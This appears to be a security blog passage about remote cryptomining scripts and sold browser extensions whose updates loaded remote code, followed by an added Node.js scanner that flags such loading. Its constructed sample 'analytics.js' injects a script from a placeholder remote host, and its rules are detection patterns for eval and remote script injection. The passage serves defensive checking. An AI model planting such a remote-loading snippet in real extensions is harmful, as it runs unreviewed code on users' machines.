The mining code doesn't need to be included in the webpage. You just call it from a remote site.
Another attack vector that gained some interest last week was the subversion of established browser extensions.
The writer/owner of a browser extension downloaded by 2M+ users sold the rights to an unknown party, who made 'updates' to the code without documenting those changes. When some folks decided to look at the code changes (on GitHub), they found that what appeared to be innocuous additions of open source analytics code were in fact calling remote scripts and had links to other extensions that had been bought and replaced with malware.
Updates to the extension had also been downloaded automatically so it is probable that some users were running the suspect code without knowing it.
The moral of the story is: be careful with what extensions you download, do not allow auto updates, and don't update manually until you've checked that it's still clean.
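One way to do the "check that it's still clean" step the post recommends, as an added example that is not part of the original post: a small Node.js script that scans an unpacked extension's files for the pattern described above, an "analytics" addition that actually loads a script from a remote host, plus a manifest CSP that would let such a load through. The sample extension files, the rule set, and the `.invalid` domain are constructed for illustration and are not from any real extension.

```javascript
// Added example, not from the original post: a static check for remote code
// loading in an unpacked browser extension. The sample extension below is
// constructed; analytics.js mimics an "innocuous analytics" change that pulls
// a script from a remote host at runtime.

const REMOTE_URL = /https?:\/\/[^'"`\s)]+/i;

// Line-level patterns meaning "code arrives or is built at runtime".
const JS_RULES = [
  { rule: "dynamic-script-tag", re: /createElement\s*\(\s*['"`]script['"`]\s*\)/, why: "creates a <script> element at runtime" },
  { rule: "remote-script-src", re: /\.src\s*=\s*['"`]https?:\/\//, why: "points a script at a remote host" },
  { rule: "eval", re: /\beval\s*\(/, why: "evaluates a string as code" },
  { rule: "new-function", re: /new\s+Function\s*\(/, why: "compiles a string into a function" },
  { rule: "import-scripts-remote", re: /importScripts\s*\(\s*['"`]https?:\/\//, why: "worker loads a remote script" },
];

// Manifest check: a script-src that allows a remote origin lets the extension
// run code that was never in the repository a reviewer looked at.
function scanManifest(text) {
  let manifest;
  try {
    manifest = JSON.parse(text);
  } catch (e) {
    return [{ file: "manifest.json", line: 0, rule: "manifest-unparseable", why: e.message, url: null }];
  }
  const csp = manifest.content_security_policy;
  // MV2 uses a string; MV3 uses an object with an extension_pages key.
  const policy = typeof csp === "string" ? csp : (csp && csp.extension_pages) || "";
  const findings = [];
  for (const directive of policy.split(";")) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0] !== "script-src") continue;
    for (const t of tokens.slice(1)) {
      if (/^https?:/i.test(t)) {
        findings.push({ file: "manifest.json", line: 0, rule: "csp-allows-remote-script", why: "script-src permits " + t, url: t });
      }
    }
  }
  return findings;
}

// Scan one JS file line by line; report the rule hit and any URL on that line.
function scanScript(name, text) {
  const findings = [];
  text.split("\n").forEach((line, i) => {
    for (const { rule, re, why } of JS_RULES) {
      if (re.test(line)) {
        const m = REMOTE_URL.exec(line);
        findings.push({ file: name, line: i + 1, rule, why, url: m ? m[0] : null });
      }
    }
  });
  return findings;
}

// files: { filename: contents }, e.g. read from an unpacked extension directory.
function scanExtension(files) {
  const findings = [];
  for (const [name, text] of Object.entries(files)) {
    if (name === "manifest.json") findings.push(...scanManifest(text));
    else if (name.endsWith(".js")) findings.push(...scanScript(name, text));
  }
  return findings;
}

// Constructed sample extension (not a real one): a benign-looking analytics
// snippet that injects a remote script, and a CSP that permits it.
const SAMPLE_EXTENSION = {
  "manifest.json": JSON.stringify({
    manifest_version: 2,
    name: "Example Extension",
    version: "2.0.1",
    content_security_policy: "script-src 'self' https://stats.example-analytics.invalid; object-src 'self'",
  }),
  "analytics.js": [
    "// lightweight usage analytics",
    "(function () {",
    "  var s = document.createElement('script');",
    "  s.src = 'https://stats.example-analytics.invalid/collect.js?v=' + Date.now();",
    "  document.head.appendChild(s);",
    "})();",
  ].join("\n"),
  "background.js": [
    "chrome.runtime.onInstalled.addListener(function () {",
    "  console.log('installed');",
    "});",
  ].join("\n"),
};

if (typeof require !== "undefined" && require.main === module) {
  for (const f of scanExtension(SAMPLE_EXTENSION)) {
    console.log(`${f.file}:${f.line} ${f.rule}: ${f.why}${f.url ? " (" + f.url + ")" : ""}`);
  }
}
```

Run it against a directory dump of the extension before accepting an update; anything flagged under `remote-script-src`, `csp-allows-remote-script` or `eval` means the code you can read on GitHub is not the code that will actually execute, which is exactly the trick described above. The rules are deliberately crude string matches, so treat a hit as a reason to read that file, not as proof of malware.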